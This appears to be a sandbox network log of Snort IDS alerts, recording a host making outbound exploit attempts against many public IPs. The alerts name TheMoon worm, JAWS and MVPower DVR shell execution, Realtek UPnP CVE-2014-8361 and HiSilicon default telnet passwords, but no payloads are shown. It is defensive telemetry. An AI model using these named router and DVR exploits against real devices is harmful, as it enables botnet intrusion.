| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:55446 -> 172.67.149.45:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:43620 -> 172.64.108.102:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:38580 -> 172.65.136.113:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:56926 -> 172.67.213.157:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:42424 -> 98.245.204.77:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:35132 -> 98.166.2.245:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:52592 -> 98.172.137.114:8080 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.62.30:80 -> 192.168.2.23:39146 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.28.93:80 -> 192.168.2.23:48624 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59468 -> 200.232.87.52:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58552 -> 37.10.123.43:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56474 -> 23.12.143.197:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34212 -> 90.255.234.136:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34212 -> 90.255.234.136:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49086 -> 212.52.25.78:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.12.143.197:80 -> 192.168.2.23:56474 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56474 -> 23.12.143.197:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47932 -> 95.217.212.105:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41516 -> 74.206.176.230:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36162 -> 38.17.54.235:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43926 -> 209.147.132.220:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49086 -> 212.52.25.78:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55168 -> 14.176.133.130:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54070 -> 114.142.227.114:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55168 -> 14.176.133.130:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54070 -> 114.142.227.114:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.85.102:80 -> 192.168.2.23:46516 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.228.199:80 -> 192.168.2.23:59010 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.45.183:80 -> 192.168.2.23:60732 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.131.39:80 -> 192.168.2.23:40284 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:43728 -> 172.64.108.102:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:57592 -> 172.65.209.118:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:33472 -> 98.39.140.133:8080 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58920 -> 146.0.242.185:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51528 -> 37.59.171.133:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44504 -> 93.241.236.211:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46666 -> 78.128.62.106:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44504 -> 93.241.236.211:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46666 -> 78.128.62.106:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50960 -> 115.42.185.129:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47536 -> 192.16.58.52:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49776 -> 108.177.203.47:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55576 -> 220.81.112.178:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50960 -> 115.42.185.129:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49776 -> 108.177.203.47:80 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:57846 -> 172.64.94.107:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:41050 -> 172.104.16.26:8080 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50698 -> 114.29.213.34:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.130.78:80 -> 192.168.2.23:37344 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.232.234:80 -> 192.168.2.23:58238 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50698 -> 114.29.213.34:80 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:60510 -> 172.66.42.209:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:34272 -> 172.65.131.86:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:56422 -> 172.64.93.174:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:48634 -> 172.65.203.209:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:52254 -> 172.65.226.85:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:53236 -> 172.65.135.137:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:57066 -> 98.197.205.231:8080 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.134.173:80 -> 192.168.2.23:50948 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.25.192:80 -> 192.168.2.23:46648 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:33464 -> 184.94.138.149:8080 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38504 -> 88.221.224.231:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.224.231:80 -> 192.168.2.23:38504 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49392 -> 80.196.128.254:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48604 -> 104.64.206.72:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39958 -> 52.4.66.196:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53224 -> 104.253.104.25:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49392 -> 80.196.128.254:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39742 -> 104.65.52.38:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.64.206.72:80 -> 192.168.2.23:48604 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48604 -> 104.64.206.72:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39958 -> 52.4.66.196:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.65.52.38:80 -> 192.168.2.23:39742 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39742 -> 104.65.52.38:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40052 -> 23.193.223.99:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56742 -> 72.13.186.40:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.193.223.99:80 -> 192.168.2.23:40052 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:46696 -> 172.67.214.100:8080 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53094 -> 54.171.23.34:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48914 -> 89.207.146.188:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53094 -> 54.171.23.34:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47968 -> 150.95.214.224:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48914 -> 89.207.146.188:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54514 -> 23.38.249.39:80 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:55092 -> 98.169.52.142:8080 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.237.238:80 -> 192.168.2.23:47554 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47968 -> 150.95.214.224:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.38.249.39:80 -> 192.168.2.23:54514 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60816 -> 104.72.67.245:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57208 -> 87.237.13.130:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38386 -> 50.105.82.236:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57358 -> 85.199.229.132:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57208 -> 87.237.13.130:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57358 -> 85.199.229.132:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.152.57:80 -> 192.168.2.23:48724 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.72.67.245:80 -> 192.168.2.23:60816 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60816 -> 104.72.67.245:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38386 -> 50.105.82.236:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49622 -> 216.127.165.101:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41046 -> 107.162.184.132:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49494 -> 23.77.146.63:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41046 -> 107.162.184.132:80 |
| Source: Traffic | Snort IDS: 215 BACKDOOR MISC Linux rootkit attempt 192.168.2.23:34410 -> 222.148.237.245:23 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.77.146.63:80 -> 192.168.2.23:49494 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:37118 -> 172.65.139.233:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:33310 -> 172.67.240.130:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:52802 -> 172.65.30.12:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:55344 -> 172.67.190.155:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:37882 -> 172.67.57.222:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:37972 -> 184.168.177.34:8080 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35248 -> 104.16.182.244:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45540 -> 178.18.254.28:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60708 -> 23.65.195.130:80 |
| Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54692 -> 191.61.165.96:52869 |
| Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51798 -> 191.61.227.248:52869 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60470 -> 99.80.20.134:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42354 -> 198.199.68.151:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45256 -> 189.144.135.111:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34298 -> 65.211.1.181:80 |
| Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40816 -> 191.61.196.72:52869 |
| Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42812 -> 191.61.72.206:52869 |
| Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58048 -> 191.61.71.209:52869 |
| Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52120 -> 191.61.229.129:52869 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35248 -> 104.16.182.244:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57442 -> 134.68.225.96:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49256 -> 156.235.102.52:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.65.195.130:80 -> 192.168.2.23:60708 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:41842 -> 184.59.168.130:8080 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.223.104:80 -> 192.168.2.23:36082 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.214.143:80 -> 192.168.2.23:43444 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46696 -> 82.196.3.62:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46758 -> 82.196.3.62:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46696 -> 82.196.3.62:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46758 -> 82.196.3.62:80 |
| Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58854 -> 191.61.59.240:52869 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:59008 -> 172.67.63.160:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:37342 -> 172.65.13.86:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:38164 -> 172.64.129.191:8080 |
| Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59688 -> 190.135.23.91:52869 |
| Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39350 -> 190.134.214.122:52869 |
| Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39960 -> 190.133.148.47:52869 |
| Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33920 -> 190.135.239.221:52869 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:51442 -> 98.124.87.113:8080 |
| Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57464 -> 210.16.96.137:52869 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54912 -> 156.229.185.8:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51678 -> 154.14.130.158:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33346 -> 86.157.229.76:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37830 -> 193.24.220.97:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33346 -> 86.157.229.76:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51678 -> 154.14.130.158:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43528 -> 200.69.35.64:80 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:42356 -> 172.67.62.101:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:38494 -> 172.67.147.233:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:38078 -> 172.65.250.28:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:50224 -> 172.67.129.82:8080 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43196 -> 51.195.23.79:80 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:50636 -> 184.82.190.122:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:57414 -> 172.64.69.12:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:53942 -> 172.65.87.164:8080 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43528 -> 200.69.35.64:80 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:53468 -> 172.65.59.143:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:53822 -> 172.67.213.171:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:41726 -> 184.151.7.207:8080 |
| Source: Traffic | Snort IDS: 1251 INFO TELNET Bad Login 59.4.192.2:23 -> 192.168.2.23:40070 |
| Source: Traffic | Snort IDS: 718 INFO TELNET login incorrect 59.4.192.2:23 -> 192.168.2.23:40070 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54896 -> 156.229.185.8:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43456 -> 69.167.170.121:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48992 -> 66.163.197.100:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43456 -> 69.167.170.121:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.135.28:80 -> 192.168.2.23:53726 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.200.105:80 -> 192.168.2.23:34096 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59028 -> 23.106.33.215:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51914 -> 217.112.199.226:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54274 -> 84.19.180.3:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42146 -> 98.206.24.153:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38514 -> 54.182.5.72:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38510 -> 54.182.5.72:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46128 -> 103.29.215.180:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42146 -> 98.206.24.153:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38510 -> 54.182.5.72:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51798 -> 167.114.179.93:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50248 -> 45.223.30.129:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50248 -> 45.223.30.129:80 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:50916 -> 172.67.200.24:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:44184 -> 172.67.38.53:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:48446 -> 172.65.190.12:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:32932 -> 184.168.159.222:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:33478 -> 172.65.235.128:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:40036 -> 172.67.142.86:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:59098 -> 98.164.155.66:8080 |
| Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35542 -> 190.134.19.61:52869 |
| Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55346 -> 190.134.161.127:52869 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56536 -> 96.9.55.45:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41736 -> 104.105.254.162:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38430 -> 23.73.141.61:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.73.141.61:80 -> 192.168.2.23:38430 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60570 -> 37.202.55.137:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56536 -> 96.9.55.45:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.105.254.162:80 -> 192.168.2.23:41736 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34170 -> 154.212.171.89:80 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:39508 -> 184.168.173.167:8080 |
| Source: Traffic | Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:34920 -> 222.148.237.245:23 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55070 -> 104.25.66.163:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55070 -> 104.25.66.163:80 |
